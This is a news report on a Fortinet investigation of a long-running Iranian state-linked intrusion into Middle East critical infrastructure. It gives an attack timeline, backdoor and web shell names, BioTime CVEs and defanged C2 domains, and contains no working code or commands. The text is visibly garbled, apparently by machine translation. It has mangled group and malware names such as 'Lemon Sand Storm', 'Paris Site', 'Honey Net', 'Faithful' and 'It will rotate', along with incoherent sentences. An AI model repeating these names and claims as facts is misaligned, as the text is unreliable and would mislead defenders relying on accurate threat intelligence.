The Iranian state-sponsored threat groups stem from a long-term cyber invasion targeting key national infrastructure (CNI) in the Middle East that lasted nearly two years.
Activities that lasted at least from May 2023 to February 2025 included “a widespread espionage and network prepositions that are often suspected, accompanied by tactics often used to maintain sustained access for future strategic advantages.”
The Network Security Company noted that the attacks displaying secretaries overlaps with known Iranian nation-state threat actors. Lemon Sand Storm It is also tracked as (formerly Rubidium), Paris Site, Pioneer Kitten, and UNC757.
Since at least 2017, the aerospace, oil and gas, water and electricity sectors, as well as the electricity sectors of the Middle East, Europe and Australia have been rated active. According to industrial cybersecurity company Dragos, the enemy exploited the known virtual private network (VPN) security flaws from Fortinet, Pulse Secure and Palo Alto Networks to gain initial access.
Last year, US Cybersecurity and Intelligence Agency pointed its fingers at Lemon Sandstorm to deploy ransomware against entities in the US, Israel, Azerbaijan and the United Arab Emirates.
The attacks analyzed by Fortinet on CNI entities have been unfolding in four stages starting in May 2023, employing weapons of tools that evolve when victims enact countermeasures.
- May 15, 2023 – April 29, 2024 – Use stolen login credentials to access the victim’s SSL VPN system, drop a web shell on a public server, and establish a foothold by deploying three backdoors, Havoc, Hanifnet, and HxLibrary for long-term access
- April 30, 2024 – November 22, 2024 – Integrate scaffolding by planting more webshells and additional backdoors called NeoExpressrat, dig deeper into the network using tools like Plink and Ngrok, perform targeting of victim emails, and perform lateral movements into virtualized infrastructure
- November 23, 2024 – December 13, 2024 – Deploy more webshells and two backdoors, Mesh Central Agent and SystemBC depending on the initial containment and repair procedures performed by the victim
- December 14, 2024 – Currently – Try to reinvest in the network by exploiting known biotime vulnerabilities (CVE-2023-38950, CVE-2023-38951, and CVE-2023-38952).
It is worth noting that both Havoc and Meshcentral are open source tools that act as command and control (C2) frameworks, respectively, and as remote monitoring and management (RMM) software. On the other hand, SystemBC refers to commodity malware that often serves as a precursor to ransomware deployment.
Here’s a brief description of the custom malware family used in the attack –
- Honey Net -Unsigned .NET executable that can retrieve and execute commands from C2 server (first unfolded in August 2023)
- hxlibrary – The malicious IIS module written in .NET is designed to retrieve three identical text files hosted in Google Docs to get a C2 server and send web requests (first unfolded in October 2023)
- Faithful – A DLL-based tool that allows you to collect credentials from Windows Local Security Authority Subsystem Service (LSASS) process memory (first deployed in November 2023)
- RemoteInjector – Loader components used to run next stage payloads like Havoc (first deployed in April 2024)
- It will rotate – Webshell used for initial reconnaissance (first deployed in April 2024)
- neoexpressrat – Backdoor that retrieves configuration from a C2 server and probably uses Discord for subsequent communications (first deployed in August 2024)
- Drop shell – Web shell with basic file upload functionality (first deployed in November 2024)
- DarkLoadLibrary -Open source loader used to launch SystemBC (first deployed in December 2024)
The link to Lemon Sand Storm comes from C2 Infrastructure – apps.gist.githubapp(.)net and gupdate(.)net.
Fortinet said the victim’s limited operational technology (OT) network is a key target for attacks based on the widespread reconnaissance of threat actors and violations of network segments hosting OT adjacent systems. However, there is no evidence that the enemy has invaded the OT network.
The majority of malicious activities are rated as practical keyboard operations performed by different individuals, taking into account command errors and consistent work schedules. Furthermore, a deeper investigation into the incident revealed that threat actors may have accessed the network on May 15, 2021.
“Through the intrusion, the attackers leveraged chained proxies and custom implants to bypass network segmentation and move laterally within the environment,” the company said. “At a later stage we consistently checked four different proxy tools for accessing internal network segments, demonstrating a sophisticated approach to maintain persistence and avoiding detection.”
